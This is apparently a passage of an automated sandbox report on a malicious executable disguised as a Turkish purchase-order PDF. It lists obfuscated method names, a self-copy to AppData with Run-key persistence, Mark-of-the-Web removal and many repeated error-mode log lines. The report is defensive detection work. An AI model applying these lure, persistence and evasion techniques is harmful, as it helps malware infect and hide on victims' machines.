                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, T6xyn5eNsSbpx3PLt2.cs High entropy of concatenated method names: 'lwvlXEjwdG', 'd8wljijiCv', 'b0alelYUAL', 'jhelIeGOLx', 'R0dl4IANpm', 'noelFF19Y2', 'gFLlPBBodY', 'CMCvu3DOMJ', 'jY7vkbiMmP', 'bIGvdeKITt'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, yfxSClFQMwFmEK7MNd.cs High entropy of concatenated method names: 'gHYvs0YqNq', 'xXQvfKbqp5', 'tfdvQIUkdA', 'pltvGVRaKY', 'CpDvqD8f8h', 'vcTvJNwC5r', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, yOgMYxXHsaP1Od2Zjt.cs High entropy of concatenated method names: 'aNHacmHOro', 'xMWaxRQQUG', 'SfvaqVYQoG', 'UQraZGtIqa', 'vu1af1NpbH', 'dP6aQb5iT0', 'unqaGn8lRE', 'uuAaJkefs4', 'K0OaoreKTI', 'AsjaNJUqe2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Crn3a66HqHiB80qX1X.cs High entropy of concatenated method names: 'byBX6yw6N1', 'gFcX3qYBKN', 'bYhXEmXc63', 'Y28XiYegO4', 'YHyXabcPCo', 'aRpXTe7ppB', 'I1hYLgEn8P4amhhEat', 'm3sFc9LipkykZ3H8j3', 'ktaXXJZpfh', 'T6cXjwG0HS'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack: the same 20 classes with the same method names as in the 3c35ad0.3 dump above (a second in-memory copy of the same unpacked assembly)
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe File created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwT (2 occurrences)

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe File opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier (access: read attributes | delete; removes the Mark-of-the-Web stream from the dropped copy)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Process information set: NOOPENFILEERRORBOX (42 occurrences; SetErrorMode with SEM_NOOPENFILEERRORBOX suppresses the missing-file error dialog)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (19 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
